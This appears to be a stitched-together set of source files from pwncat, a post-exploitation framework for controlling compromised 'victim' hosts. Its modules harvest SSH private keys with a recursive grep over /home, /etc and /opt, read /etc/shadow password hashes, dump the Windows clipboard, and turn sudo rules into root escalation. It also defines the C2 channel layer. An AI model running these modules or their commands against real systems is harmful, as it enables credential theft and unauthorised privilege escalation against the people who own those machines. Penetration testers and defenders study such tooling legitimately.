    """Tracks a new directory created on the target. The entire
    directory will be deleted upon revert.

    :param source: generating module or routine
    :type source: str
    :param uid: UID needed to revert
    :type uid: Union[int, str]
    :param path: path to replaced file
    :type path: str
    :param timestamp: the datetime that this change occurred
    :type timestamp: Optional[datetime.datetime]
    """

    def __init__(
        self,
        source: str,
        uid: Union[int, str],
        path: str,
        timestamp: Optional[datetime.datetime] = None,
    ):
        super().__init__(source, uid, timestamp=timestamp)

        self.path = path

    @property
    def revertable(self):
        return True

    def revert(self, session: "pwncat.manager.Session"):

        try:
            session.platform.Path(self.path).rmdir()
        except PermissionError:
            raise ModuleFailed("permission error")

        self.reverted = True

    def title(self, session: "pwncat.manager.Session"):
        return self._annotate_title(
            session, f"created directory at [cyan]{self.path}[cyan]"
        )



#!/usr/bin/env python3


import rich.markup

from pwncat.db import Fact
from pwncat.modules import ModuleFailed
from pwncat.platform.windows import Windows, PowershellError
from pwncat.modules.enumerate import EnumerateModule


class ClipboardData(Fact):
    def __init__(self, source, contents: str):
        super().__init__(source=source, types=["system.clipboard"])

        self.contents: bool = contents

    def title(self, session):
        return "Current clipboard contents:"

    def description(self, session):
        return f"[yellow]{rich.markup.escape(self.contents)}[/yellow]"


class Module(EnumerateModule):
    """Enumerate the current Windows Defender settings on the target"""

    PROVIDES = ["system.clipboard"]
    PLATFORM = [Windows]

    def enumerate(self, session):

        try:
            result = session.platform.powershell("Get-Clipboard")

            if not result:
                return

            if isinstance(result[0], list) and result:
                contents = "\n".join(result[0])
            else:
                contents = result[0]

        except PowershellError as exc:
            raise ModuleFailed("failed to retrieve clipboard contents") from exc

        yield ClipboardData(self.name, contents)



#!/usr/bin/env python3
import pwncat
from pwncat.commands import CommandDefinition


class Command(CommandDefinition):
    """
    Reset the remote terminal to the standard pwncat settings. This will set
    your remote prompt and synchronize the terminal state. It will also ensure
    that the HISTFILE, PROMPT_COMMAND, and other common shell settings are setup
    properly. Run this if you ever end up in a peculiar situation on the remote
    host and are unable to reset it manually.
    """

    PROG = "reset"
    ARGS = {}
    DEFAULTS = {}
    LOCAL = False

    def run(self, manager: "pwncat.manager.Manager", args):

        manager.log("[yellow]warning[/yellow]: reset not implemented in new framework")
        # pwncat.victim.reset()



#!/usr/bin/env python3

import rich.markup
from Crypto.PublicKey import RSA

import pwncat
from pwncat.facts import PrivateKey
from pwncat.modules import Status
from pwncat.platform.linux import Linux
from pwncat.modules.enumerate import Schedule, EnumerateModule


class Module(EnumerateModule):
    """
    Search the victim file system for configuration files which may
    contain private keys. This uses a regular expression based search
    to find files whose contents look like a SSH private key.
    """

    PROVIDES = ["creds.private_key"]
    PLATFORM = [Linux]
    SCHEDULE = Schedule.PER_USER

    def enumerate(self, session: "pwncat.manager.Session"):

        # This uses a list because it does multiple things
        # 1. It _finds_ the private key locations
        # 2. It tries to _read_ the private keys
        # This needs to happen in two loops because it has to happen one at
        # at a time (you can't have two processes running at the same time)
        # ..... (right now ;)
        facts = []

        # Search for private keys in common locations
        proc = session.platform.Popen(
            "grep -l -I -D skip -rE '^-+BEGIN .* PRIVATE KEY-+$' /home /etc /opt 2>/dev/null | xargs stat -c '%u %n' 2>/dev/null",
            shell=True,
            text=True,
            stdout=pwncat.subprocess.PIPE,
        )

        with proc.stdout as pipe:
            yield Status("searching for private keys")
            for line in pipe:
                line = line.strip().split(" ")
                uid, path = int(line[0]), " ".join(line[1:])
                yield Status(f"found [cyan]{rich.markup.escape(path)}[/cyan]")
                facts.append(PrivateKey(self.name, path, uid, None, False))

        # Ensure proc is cleaned up
        proc.wait()

        for fact in facts:
            try:
                yield Status(f"reading [cyan]{rich.markup.escape(fact.path)}[/cyan]")
                with session.platform.open(fact.path, "r") as filp:
                    fact.content = filp.read().strip().replace("\r\n", "\n")

                try:
                    # Try to import the key to test if it's valid and if there's
                    # a passphrase on the key. An "incorrect checksum" ValueError
                    # is raised if there's a key. Not sure what other errors may
                    # be raised, to be honest...
                    RSA.importKey(fact.content)
                except ValueError as exc:
                    if "incorrect checksum" in str(exc).lower():
                        # There's a passphrase on this key
                        fact.encrypted = True
                    else:
                        # Some other error happened, probably not a key
                        continue

                yield fact
            except (PermissionError, FileNotFoundError):
                continue



#!/usr/bin/env python3
import re
from typing import List, Optional

import rich.markup

from pwncat.db import Fact
from pwncat.facts import build_gtfo_ability
from pwncat.gtfobins import Stream
from pwncat.platform.linux import Linux
from pwncat.modules.enumerate import Schedule, EnumerateModule

"""
TODO: This should end up yielding an escalation ability, since sudo
will... inherently give us the potential to run things as the root user.
We can implement that later after all the enumeration modules are set.
"""

per_user = True
sudo_pattern = re.compile(
    r"""(%?[a-zA-Z][a-zA-Z0-9_]*)\s+([a-zA-Z_][-a-zA-Z0-9_.]*)\s*="""
    r"""(\([a-zA-Z_][-a-zA-Z0-9_]*(:[a-zA-Z_][a-zA-Z0-9_]*)?(,\ *!?[a-zA-Z_][-a-zA-Z0-9_]*(:[a-zA-Z_][a-zA-Z0-9_]*)?)*\)|[a-zA-Z_]"""
    r"""[a-zA-Z0-9_]*)?\s+((NOPASSWD:\s+)|(SETENV:\s+)|(sha[0-9]{1,3}:"""
    r"""[-a-zA-Z0-9_]+\s+))*(.*)"""
)

directives = ["Defaults", "User_Alias", "Runas_Alias", "Host_Alias", "Cmnd_Alias"]


class SudoSpec(Fact):
    def __init__(
        self,
        source,
        line: str,
        matched: bool = False,
        user: Optional[str] = None,
        group: Optional[str] = None,
        host: Optional[str] = None,
        runas_user: Optional[str] = None,
        runas_group: Optional[str] = None,
        options: List[str] = None,
        hash: str = None,
        commands: List[str] = None,
    ):
        super().__init__(source=source, types=["software.sudo.rule"])

        self.line: str = line
        """ The full, unaltered line from the sudoers file """
        self.matched: bool = matched
        """ The regular expression match data. If this is None, all following fields
        are invalid and should not be used. """
        self.user: Optional[str] = user
        """ The user which this rule applies to. This is None if a group was specified """
        self.group: Optional[str] = group
        """ The group this rule applies to. This is None if a user was specified. """
        self.host: Optional[str] = host
        """ The host this rule applies to """
        self.runas_user: Optional[str] = runas_user
        """ The user we are allowed to run as """
        self.runas_group: Optional[str] = runas_group
        """ The GID we are allowed to run as (may be None)"""
        self.options: List[str] = options
        """ A list of options specified (e.g. NOPASSWD, SETENV, etc) """
        self.hash: str = hash
        """ A hash type and value which sudo will obey """
        self.commands: List[str] = commands
        """ The command specification """

    def title(self, session):
        display = ""

        if not self.matched:
            return self.line

        if self.user is not None:
            display += f"User [blue]{rich.markup.escape(self.user)}[/blue]: "
        else:
            display += f"Group [cyan]{rich.markup.escape(self.group)}[/cyan]: "

        display += f"[yellow]{'[/yellow], [yellow]'.join((rich.markup.escape(c) for c in self.commands))}[/yellow] as "

        if self.runas_user == "root":
            display += "[red]root[/red]"
        elif self.runas_user is not None:
            display += f"[blue]{rich.markup.escape(self.runas_user)}[/blue]"

        if self.runas_group == "root":
            display += ":[red]root[/red]"
        elif self.runas_group is not None:
            display += f"[cyan]{rich.markup.escape(self.runas_group)}[/cyan]"

        if self.host is not None:
            display += f" on [magenta]{rich.markup.escape(self.host)}[/magenta]"

        if self.options:
            display += (
                " ("
                + ",".join(
                    f"[green]{rich.markup.escape(x)}[/green]" for x in self.options
                )
                + ")"
            )

        return display

    def description(self, session):
        return None


def LineParser(source, line):
    match = sudo_pattern.search(line)

    if match is None:
        return SudoSpec(source, line, matched=False, options=[])

    user = match.group(1)

    if user in directives:
        return SudoSpec(source, line, matched=False, options=[])

    if user.startswith("%"):
        group = user.lstrip("%")
        user = None
    else:
        group = None

    host = match.group(2)

    if match.group(3) is not None:
        runas_user = match.group(3).lstrip("(").rstrip(")")
        if match.group(4) is not None:
            runas_group = match.group(4).lstrip(" ")
            runas_user = runas_user.split(":")[0].rstrip(" ")
        else:
            runas_group = None
        if runas_user == "":
            runas_user = "root"
    else:
        runas_user = "root"
        runas_group = None

    options = []
    hash = None

    for g in map(match.group, [8, 9, 10]):
        if g is None:
            continue

        options.append(g.strip().rstrip(":"))
        if g.startswith("sha"):
            hash = g

    command = match.group(11)
    commands = re.split(r"""(?<!\\), ?""", command)

    rule = SudoSpec(
        source=source,
        line=line,
        matched=True,
        user=user,
        group=group,
        host=host,
        runas_user=runas_user,
        runas_group=runas_group,
        options=options,
        hash=hash,
        commands=commands,
    )

    return rule


class Module(EnumerateModule):
    """Enumerate sudo privileges for the current user. If allowed,
    this module will also enumerate sudo rules for other users. Normally,
    root permissions are needed to read /etc/sudoers."""

    PROVIDES = [
        "software.sudo.rule",
        "ability.execute",
        "ability.file.read",
        "ability.file.write",
    ]
    PLATFORM = [Linux]
    SCHEDULE = Schedule.PER_USER

    def enumerate(self, session):

        # We need to ensure that the user database is retrieved...
        # NOTE: there should probably be a shortcut for this
        session.find_user(uid=0)

        try:
            etc_sudoers = session.platform.Path("/etc/sudoers")
            if etc_sudoers.readable():
                rules = []
                with etc_sudoers.open() as filp:
                    for line in filp:
                        line = line.strip()
                        # Ignore comments and empty lines
                        if line.startswith("#") or line == "":
                            continue

                        rule = LineParser(self.name, line)

                        # Yield the sudo rule
                        yield rule

                        rules.append(rule)

                for rule in rules:

                    # We can't handle abilities which we didn't parse properly
                    if not rule.matched:
                        continue

                    user_name = rule.runas_user
                    if user_name == "ALL":
                        user_name = "root"

                    # Grab the user by name so we can get the UID
                    runas_user = session.find_user(name=user_name)
                    if runas_user is None:
                        # Not a valid user? :/
                        continue

                    user = session.find_user(name=rule.user)
                    if user is None:
                        continue

                    # Yield escalation abilities
                    for spec in rule.commands:
                        yield from (
                            build_gtfo_ability(
                                self.name,
                                runas_user.id,
                                method,
                                spec=spec,
                                source_uid=user.id,
                                user=runas_user.name,
                            )
                            for method in session.platform.gtfo.iter_sudo(
                                spec, stream=Stream.RAW
                            )
                        )

                return
        except (FileNotFoundError, PermissionError):
            pass

        # Check for our privileges
        try:

            current_user = session.current_user()

            proc = session.platform.sudo(["sudo", "-nl"], as_is=True, text=True)
            result = proc.stdout.read()
            proc.wait()  # ensure this closes properly

        except PermissionError:
            # if this asks for a password and we don't have one, bail
            return

        for line in result.split("\n"):
            line = line.rstrip()

            # Skip header lines
            if not line.startswith(" ") and not line.startswith("\t"):
                continue

            # Strip beginning whitespace
            line = line.strip()

            # Skip things that aren't user specifications
            if not line.startswith("("):
                continue

            # Build the beginning part of a normal spec
            line = f"{session.current_user().name} local=" + line.strip()
            rule = LineParser(self.name, line)

            # Yield the sudo rule
            yield rule

            # We can't handle abilities which we didn't parse properly
            if not rule.matched:
                continue

            user_name = rule.runas_user
            if user_name == "ALL":
                user_name = "root"

            # Grab the user by name so we can get the UID
            user = session.find_user(name=user_name)
            if user is None:
                # Not a valid user? :/
                continue

            # Yield escalation abilities
            for spec in rule.commands:
                yield from (
                    build_gtfo_ability(
                        self.name,
                        user.id,
                        method,
                        spec=spec,
                        user=user.name,
                        source_uid=current_user.id,
                    )
                    for method in session.platform.gtfo.iter_sudo(
                        spec, stream=Stream.RAW
                    )
                )



"""
Channels represent the basic communication object within pwncat. Each channel
abstracts a communication method with a target. By default, pwncat implements
a few standard channels: socket bind/connect and ssh.

A channel largely mimics a standard socket, however exact compatibility with
sockets was not the goal. Instead, it provides a low-level communication channel
between the target and the attacker. Channels make no assumption about protocol
of the C2 connection. This is the platform's job.

As a user, you will never directly create a channel. Instead, you will call
:func:`pwncat.manager.Manager.create_session`. This method will in turn
locate an appropriate channel based on your arguments, and pass all arguments
to the constructor for the appropriate channel type.
"""
import time
from io import DEFAULT_BUFFER_SIZE, RawIOBase, BufferedReader, BufferedWriter
from abc import ABC, abstractmethod
from typing import Type, Union, Optional

import pwncat

CHANNEL_TYPES = {}


class ChannelError(Exception):
    """Generic failure of a channel operation.

    :param ch: the channel which caused the exception
    :type ch: Channel
    :param msg: a message describing the failure
    :type msg: str
    """

    def __init__(self, ch, msg="generic channel failure"):
        super().__init__(msg)
        self.channel = ch


class ChannelClosed(ChannelError):
    """A channel was closed unexpectedly during communication. This
    exception provides a :func:`cleanup` method which will cleanup the
    channel within the manager to ensure no further errors occur.
    This method is normally called by the manager itself upon catching
    the exception, but you should call this method if you intercept
    and do not re-throw the exception.

    :param ch: the channel which caused the exception
    :type ch: Channel
    """

    def __init__(self, ch):
        super().__init__(ch, "channel unexpectedly closed")

    def cleanup(self, manager: "pwncat.manager.Manager"):
        """Cleanup this channel from the manager"""

        # If we don't have a session, there's nothing to do
        session = manager.find_session_by_channel(self.channel)
        if session is None:
            return

        # Session takes care of removing itself from the manager
        # and unsetting `manager.target` if needed.
        session.died()


class ChannelTimeout(ChannelError):
    """A timeout was reached while reading or writing a channel.

    :param data: the data read before the timeout occurred
    :type data: bytes
    """

    def __init__(self, ch, data: bytes):
        super().__init__(ch, f"channel receive timed out: {repr(data)}")
        self.data: bytes = data


class ChannelFile(RawIOBase):
    """
    Wrap a channel in a file-like object. Mainly used for process IO by
    the platform wrappers. It enables platforms to quickly create a file-like
    object which is bounded by a delimeter and can be returned to the user
    safely. You will not normally create this class directly, but should use
    the func:`Channel.makefile`` method instead.

    :param channel: the channel to which we bind the file
    :type channel: Channel
    :param mode: a file mode (e.g. "r" or "w")
    :type mode: str
    :param sof: start of file delimeter; we will recv until this before returning.
    :type sof: Optional[bytes]
    :param eof: end of file delimeter; eof will be set after seeing this bytestr
    :type eof: Optional[bytes]
    :param on_close: a method to call before closing the file
    :type on_close: Callable[[Channel], None]
    """

    def __init__(
        self,
        channel: "Channel",
        mode: str,
        sof: Optional[bytes] = None,
        eof: Optional[bytes] = None,
        on_close=None,
    ):
        self.channel = channel
        self.mode = mode
        self.sof_marker = sof
        self.eof_marker = eof
        self.found_sof = False
        self.on_close = on_close
        self.eof = False
        self._blocking = True

        if self.sof_marker is not None and "r" in self.mode:
            self.channel.recvuntil(self.sof_marker)
            self.found_sof = True

    @property
    def blocking(self) -> bool:
        """Indicates whether to act like a blocking file or not."""
        return self._blocking

    @blocking.setter
    def blocking(self, value):
        self._blocking = value

    def readable(self) -> bool:
        """Test if this is a readable file."""
        return "r" in self.mode

    def writable(self) -> bool:
        """Test if this is writable file."""
        return "w" in self.mode

    def close(self):
        """Close the file for reading/writing. This method calls the on_close hook."""

        if self.eof:
            return

        self.eof = True

        if self.on_close is not None:
            self.on_close(self)

    def readall(self):
        """Read all data until EOF"""

        data = b""

        while not self.eof:
            new_data = self.read(4096)
            if new_data is None:
                continue
            data += new_data

        return data

    def readinto(self, b: Union[memoryview, bytearray]):
        """Read as much data as possible into the given bytearray or memory view.

        :param b: the buffer data into
        :type b: Union[memoryview, bytearray]
        """

        # If we already hit EOF, don't read anymore
        if self.eof:
            return 0

        # Check the type of the argument, and grab the relevant part
        obj = b.obj if isinstance(b, memoryview) else b
        n = 0

        while n == 0:
            try:
                n = self.channel.recvinto(b)
            except NotImplementedError:
                # recvinto was not implemented, fallback recv
                data = self.channel.recv(len(b))
                b[: len(data)] = data
                n = len(data)

            if n == 0 and not self.blocking:
                return None

        obj = bytes(b[:n])

        # Check for explicit EOF in this block
        if self.eof_marker in obj:
            # Remove the marker from the output data
            # and unreceive any data not bound for us
            new_n = obj.find(self.eof_marker)
            if (n - new_n) > len(self.eof_marker):
                # We read more than the EOF marker, replace it in the buffer
                self.channel.unrecv(obj[new_n + len(self.eof_marker) :])

            # Ensure further reads don't work
            self.close()

            return new_n

        # Check for EOF split across blocks
        for i in range(1, len(self.eof_marker)):
            # See if a piece of the delimeter is at the end of this block
            piece = self.eof_marker[:i]

            if obj[-i:] == piece:
                # Peek enough bytes from the buffer to see if the rest of the
                # EOF marker is there.
                rest = self.channel.peek(len(self.eof_marker) - len(piece))

                # Are the next bytes we would read the last of the EOF marker?
                if (piece + rest) == self.eof_marker:
                    # Receive the rest of the marker
                    self.channel.recv(len(rest))
                    # Adjust the number of bytes read
                    n -= len(piece)
                    # Mark the stream as closed
                    self.close()
                    return n

        if n == 0:
            return None

        return n

    def write(self, data: bytes):
        """Write the given data to the channel

        :param data: the data to write to the channel
        :type data: bytes
        """

        if self.eof:
            return 0

        written = 0
        while written < len(data):
            written += self.channel.send(data)

        return written


class Channel(ABC):
    """
    Abstract interation with a remote victim. This class acts similarly to a
    socket object. In the common cases, it simply wraps a socket object. Some
    methods have default implementations, but many are required to be implemented.
    At a minimum, the following methods/properties must be implemented:

    - connected
    - send
    - recv
    - recvinto
    - drain
    - close

    The ``peek`` and ``unrecv`` methods have default implementations which buffer some
    data in memory. If using the default implementations of these methods, you should
    be prepared to read first from `self.peek_buffer` prior to making downstream recv
    requests.

    In general, direct connections are made during ``__init__``. If you are implementing
    a listener, the ``connect`` method can be used to wait for/accept the final
    connection. It is called just before instantiating the resulting pwncat session.
    At all times, ``connected`` should reflect the state of the underlying data channel.
    In the case of listeners, ``connected`` should only be true after ``connect`` is
    called. The ``close`` method should set ``connected`` to false.

    During initialization, you can take any keyword arguments you require to connect.
    However, you should also always accept a ``**kwargs`` argument. Parameters are
    passed dynamically from ``pwncat.channel.create`` and may be attempted with extra
    arguments you don't need.
    """

    def __init__(
        self,
        host: str,
        port: int = None,
        user: str = None,
        password: str = None,
        **kwargs,
    ):
        self.host: str = host
        self.port: int = port
        self.user: str = user
        self.password: str = password

        self.peek_buffer: bytes = b""

    @property
    @abstractmethod
    def connected(self):
        """Check if this channel is connected. This should return
        false prior to an established connection, and may return
        true prior to the ``connect`` method being called for some
        channel types."""

    def connect(self):
        """Utilize the parameters provided at initialization to
        connect to the remote host. This is mainly used for channels
        which listen for a connection. In that case, `__init__` creates
        the listener while connect actually establishes a connection.
        For direct connection-type channels, all logic can be implemented
        in the constructor.

        This method is called when creating a platform around this channel
        to instantiate the session.
        """

    @abstractmethod
    def send(self, data: bytes):
        """Send data to the remote shell. This is a blocking call
        that only returns after all data is sent.

        :param data: the data to send to the victim
        :type data: bytes
        :rtype: None
        """

    def sendline(self, data: bytes, end: bytes = b"\n"):
        """Send data followed by an ending character. If no ending
        character is specified, a new line is used. This is a blocking
        call.

        :param data: the data to send to the victim
        :type data: bytes
        :param end: the bytes to append
        :type end: bytes
        :rtype: None
        """

        return self.send(data + end)

    @abstractmethod
    def recv(self, count: Optional[int] = None) -> bytes:
        """Receive data from the remote shell

        If your channel class does not implement ``peek``, a default
        implementation is provided. If you provide a custom recv, but
        use the default :func:`peek` you must return data from
        ``self.peek_buffer`` prior to call ``recv``.

        :param count: maximum number of bytes to receive (default: unlimited)
        :type count: int
        :return: the data that was received
        :rtype: bytes
        """

    def drain(self):
        """Drain any buffered data until there is nothing left"""

        while True:
            data = self.recv(4096)
            if data is None or len(data) == 0:
                break

    def recvuntil(self, needle: bytes, timeout: Optional[float] = None) -> bytes:
        """Receive data until the specified string of bytes is found
        is found. The needle is not stripped from the data. This is a
        default implementation which utilizes the ``recv`` method.
        You can override this if your underlying transport provides a
        better implementation.

        :param needle: the bytes to wait for
        :type needle: bytes
        :param timeout: a timeout in seconds (default: 30s)
        :type timeout: Optional[float]
        :return: the bytes that were read
        :rtype: bytes
        """

        if timeout is None:
            timeout = 30

        data = b""
        time_end = time.time() + timeout

        # We read one byte at a time so we don't overshoot the goal
        while not data.endswith(needle):

            # Check if we have timed out
            if time.time() >= time_end:
                raise ChannelTimeout(self, data)

            next_byte = self.recv(1)

            if next_byte is not None:
                data += next_byte

        return data

    def recvline(self, timeout: Optional[float] = None) -> bytes:
        """Receive data until a newline is received. The newline
        is not stripped. This is a default implementation that
        utilizes the ``recvuntil`` method.

        :param timeout: a timeout in seconds for the recv
        :type timeout: float
        :rtype: bytes
        """

        return self.recvuntil(b"\n", timeout=timeout)

    def peek(self, count: Optional[int] = None, timeout: Optional[float] = None):
        """Receive data from the victim and leave the data in the recv
        buffer. This is a default implementation which uses an internal
        ``bytes`` buffer within the channel to simulate a peek. You can
        override this method if your underlying transport supports real
        ``peek`` operations. If the default ``peek`` implementation is
        used, ``recv`` should read ``self.peek_buffer`` prior to calling
        the underlying ``recv``.

        The ``timeout`` argument works differently from other methods.
        If no timeout is specified, then the method returns immediately
        and may return no data. If a timeout is provided, then the method
        will wait up to ``timeout`` seconds for at least one byte of data
        not to exceed ``count`` bytes.

        :param count: maximum number of bytes to receive (default: unlimited)
        :type count: int
        :return: data that was received
        :rtype: bytes
        """

        # Grab any already buffered data
        if self.peek_buffer:
            data = self.peek_buffer
        else:
            data = b""

        if count is not None:
            count -= len(data)

        if timeout is not None:
            end_time = time.time() + timeout
        else:
            end_time = 0

        while True:
            self.peek_buffer = b""
            new_data = self.recv(count)
            count -= len(new_data)
            data += new_data
            if len(data) or timeout is None:
                break
            if timeout is not None and time.time() > end_time:
                break
            time.sleep(0.1)

        self.peek_buffer = data

        return data

    def unrecv(self, data: bytes):
        """
        Place the given bytes on a buffer to be returned next by recv.
        This method utilizes the internal ``peek`` buffer. Therefore,
        if you implement a custom ``peek`` method, you must also implement
        ``unrecv``.

        :param data: the data to place on the incoming buffer
        :type data: bytes
        :rtype: None
        """

        # This makes the next recv return this data first
        self.peek_buffer = data + self.peek_buffer

    def makefile(
        self,
        mode: str,
        bufsize: int = -1,
        sof: Optional[bytes] = None,
        eof: Optional[bytes] = None,
    ):
        """
        Create a file-like object which acts on this channel. If the mode is
        "r", and ``sof`` and ``eof`` are specified, the file will return data
        following a line containing only ``sof`` and up to a line containing only
        ``eof``. In "w" mode, the file has no bounds and will never hit ``eof``.

        :param mode: a mode string similar to open
        :type mode: str
        :param sof: a string of bytes which indicate the start of file
        :type sof: bytes
        :param eof: a string of bytes which indicate the end of file
        :type eof: bytes
        :return: A file-like object suitable for the specified mode
        :rtype: Union[BinaryIO, TextIO]
        :raises:
          ValueError: both "r" and "w" were specified or invalid characters were found in mode
        """

        if mode != "r" and mode != "w":
            raise ValueError(f"{mode}: invalid mode")

        raw_io = ChannelFile(self, mode, sof, eof)

        if bufsize < 0 or bufsize is None:
            bufsize = DEFAULT_BUFFER_SIZE

        if mode == "r":
            return BufferedReader(raw_io, buffer_size=bufsize)
        else:
            return BufferedWriter(raw_io, buffer_size=bufsize)

    def recvinto(self, b):
        raise NotImplementedError

    @abstractmethod
    def close(self):
        """Close this channel. This method should do nothing if
        the ``connected`` property returns False."""

    def __str__(self):
        """Get a representation of this channel. The resulting string
        will be passed through ``rich`` output, so it can contain tags
        to affect styling and/or color. The default implementation returns
        ``remote_address:remote_port``"""

        return f"[cyan]{self.address[0]}[/cyan]:[blue]{self.address[1]}[/blue]"


def register(name: str, channel_class: Type[Channel]):
    """
    Register a new channel class with ``pwncat``.

    :param name: the name which this channel will be referenced by.
    :type name: str
    :param channel_class: A class object implementing the channel
      interface.
    """

    CHANNEL_TYPES[name] = channel_class


def find(name: str) -> Type[Channel]:
    """
    Retrieve the channel class for the specified name.

    :param name: the name of the channel you'd like
    :type name: str
    :return: the channel class
    :rtype: Channel Class Object
    """

    return CHANNEL_TYPES[name]


def create(protocol: Optional[str] = None, **kwargs) -> Channel:
    """
    Create a new channel with the class provided by a registered channel
    protocol. Some assumptions are made if the protocol is not specified.
    For example, if no username or password are specified, then either
    bind or connect protocols are assumed. If a username is specified,
    the ssh protocol is assumed. In any case, with no protocol, a reconnect
    is attempted first.

    :param protocol: the name of the register channel protocol (e.g. ssh, bind,
      connect)
    :type protocol: Optional[str]
    :return: A newly connected channel
    :rtype: Channel
    :raises:
      ChannelError: if the victim cannot be reached via the specified
        protocol
    """

    if protocol is None:
        protocols = []  # ["reconnect"]

        if "user" in kwargs and kwargs["user"] is not None:
            protocols.append("ssh")
        else:
            if (
                "host" not in kwargs
                or kwargs["host"] == "0.0.0.0"
                or kwargs["host"] is None
            ):
                if (
                    kwargs.get("certfile") is not None
                    or kwargs.get("keyfile") is not None
                    or kwargs.get("ssl")
                ):
                    protocols.append("ssl-bind")
                else:
                    protocols.append("bind")
            else:
                if kwargs.get("ssl"):
                    protocols.append("ssl-connect")
                else:
                    protocols.append("connect")
    else:
        protocols = [protocol]

    for prot in protocols:
        try:
            channel = find(prot)(**kwargs)
            return channel
        except ChannelError:
            if len(protocols) == 1 or prot != "reconnect":
                raise


from pwncat.channel.ssh import Ssh  # noqa: E402
from pwncat.channel.bind import Bind  # noqa: E402
from pwncat.channel.socket import Socket  # noqa: E402
from pwncat.channel.connect import Connect  # noqa: E402
from pwncat.channel.ssl_bind import SSLBind  # noqa: E402
from pwncat.channel.ssl_connect import SSLConnect  # noqa: E402

register("socket", Socket)
register("bind", Bind)
register("connect", Connect)
register("ssh", Ssh)
register("ssl-bind", SSLBind)
register("ssl-connect", SSLConnect)



#!/usr/bin/env python3

import pwncat
from pwncat.util import console
from pwncat.commands import Complete, Parameter, CommandDefinition, get_module_choices


class Command(CommandDefinition):
    """
    Set the currently used module in the config handler
    """

    PROG = "use"
    ARGS = {
        "module": Parameter(
            Complete.CHOICES,
            choices=get_module_choices,
            metavar="MODULE",
            help="the module to use",
        )
    }
    LOCAL = False

    def run(self, manager: "pwncat.manager.Manager", args):

        try:
            module = list(manager.target.find_module(args.module, exact=True))[0]
        except IndexError:
            console.log(f"[red]error[/red]: {args.module}: no such module")
            return

        manager.target.config.use(module)



"""
This package defines all database objects. pwncat internally uses
the ZODB database, which stores data as persistent Python objects.
Each class defined under this package is a persistent Python
class which is stored verbatim in the database. For documentation
on how to create persistent classes, please see the ZODB
documentation.
"""
from typing import Optional

import persistent
from persistent.list import PersistentList

from pwncat.modules import Result


class Binary(persistent.Persistent):
    """Store the name and path to binaries. This serves as the cache for
    :func:`pwncat.platform.Platform.which`."""

    def __init__(self, name, path):

        # Name of the binary (parameter to which)
        self.name: Optional[str] = name
        # The path to the binary on the remote host
        self.path: Optional[str] = path


class Fact(Result, persistent.Persistent):
    """Abstract enumerated fact about an enumerated target. Individual
    enumeration modules will create subclasses containing the data for
    the fact. All facts are also implementations of :class:`Result`
    which allows them to be generically displayed to the terminal.
    """

    def __init__(self, types, source):
        super().__init__()

        if not isinstance(types, PersistentList):
            types = PersistentList(types)

        # The type of fact (e.g.., "system.user")
        self.types: PersistentList = types
        # The original procedure that found this fact
        self.source: str = source
        self.hidden: bool = False

    def __eq__(self, o):
        """This is probably a horrible idea.

        NOTE: This is called for every comparison... the `in` operator
        wasn't working for persistent lists, so we need this to verify
        uniqueness of facts in the database.
        """

        for name, value in self.__dict__.items():
            if name.startswith("_"):
                continue
            if not hasattr(o, name) or getattr(o, name) != value:
                return False

        return True

    def category(self, session) -> str:
        return f"{self.types[0]} facts"

    @property
    def type(self):
        return self.types[0]



#!/usr/bin/env python3

import pwncat
from pwncat.modules import Status, ModuleFailed
from pwncat.facts.linux import LinuxUser
from pwncat.platform.linux import Linux
from pwncat.modules.enumerate import Schedule, EnumerateModule


class Module(EnumerateModule):
    """Enumerate users from a linux target"""

    PROVIDES = ["user"]
    PLATFORM = [Linux]
    SCHEDULE = Schedule.ONCE

    def enumerate(self, session: "pwncat.manager.Session"):

        passwd = session.platform.Path("/etc/passwd")
        shadow = session.platform.Path("/etc/shadow")
        users = {}

        try:
            with passwd.open("r") as filp:
                for user_info in filp:
                    try:
                        # Extract the user fields
                        (
                            name,
                            hash,
                            uid,
                            gid,
                            comment,
                            home,
                            shell,
                        ) = user_info.split(":")

                        # Build a user object
                        user = LinuxUser(
                            self.name,
                            name,
                            hash,
                            int(uid),
                            int(gid),
                            comment,
                            home,
                            shell,
                        )

                        users[name] = user
                        yield Status(user)

                    except Exception:
                        # Bad passwd line
                        continue
        except (FileNotFoundError, PermissionError) as exc:
            raise ModuleFailed(str(exc)) from exc

        try:
            with shadow.open("r") as filp:
                for user_info in filp:
                    try:
                        (
                            name,
                            hash,
                            last_change,
                            min_age,
                            max_age,
                            warn_period,
                            inactive_period,
                            expir_date,
                            reserved,
                        ) = user_info.split(":")

                        if users[name].hash is None:
                            users[name].hash = hash if hash != "" else None
                        if users[name].password is None and hash == "":
                            users[name].password = ""
                        users[name].last_change = int(last_change)
                        users[name].min_age = int(min_age)
                        users[name].max_age = int(max_age)
                        users[name].warn_period = int(warn_period)
                        users[name].inactive_period = int(inactive_period)
                        users[name].expiration = int(expir_date)
                        users[name].reserved = reserved
                    except (ValueError, IndexError):
                        continue
        except (FileNotFoundError, PermissionError):
            pass
        except Exception as exc:
            raise ModuleFailed(str(exc)) from exc

        # Yield all the known users after attempting to parse /etc/shadow
        yield from users.values()



#!/usr/bin/env python3

from typing import Any, Dict

import rich.markup

from pwncat.db import Fact
from pwncat.modules import ModuleFailed
from pwncat.platform.windows import Windows, PowershellError
from pwncat.modules.enumerate import EnumerateModule


class DefenderData(Fact):
    def __init__(self, source, configuration: Dict):
        super().__init__(source=source, types=["protections.defender"])

        self._configuration: Any = configuration
        """ The huge dictionary that Windows Defender returns"""

    def __getitem__(self, name):
        return self._configuration[name]

    @property
    def enabled(self) -> bool:
        return not self._configuration["DisableRealtimeMonitoring"]

    def title(self, session):

        if self.enabled:
            return "Windows Defender is [bold red]enabled[/bold red]"

        return "Windows Defender is [bold green]disabled[/bold green]"

    def description(self, session):
        output = []
        if self._configuration["ExclusionPath"]:
            output.append("[bold]Excluded paths:[/bold]")
            for path in self._configuration["ExclusionPath"]:
                output.append(f" - {rich.markup.escape(path)}")

        if not output:
            return None

        return "\n".join(output)


class Module(EnumerateModule):
    """Enumerate the current Windows Defender settings on the target"""

    PROVIDES = ["protections.defender"]
    PLATFORM = [Windows]

    def enumerate(self, session):

        if not session.platform.is_admin():
            session.log(
                "[yellow]protections warning[/yellow]: not all Defender data can be received without admin privileges"
            )

        try:
            result = session.platform.powershell("Get-MpPreference", depth=5)
            # session.print(result[0])

            if not result:
                raise ModuleFailed("could not retrieve Get-MpPreference")

            yield DefenderData(self.name, result[0])

        except PowershellError as exc:
            raise ModuleFailed(f"could not retrieve Get-MpPreference: {exc}") from exc



#!/usr/bin/env python3
from typing import Dict

import rich.markup

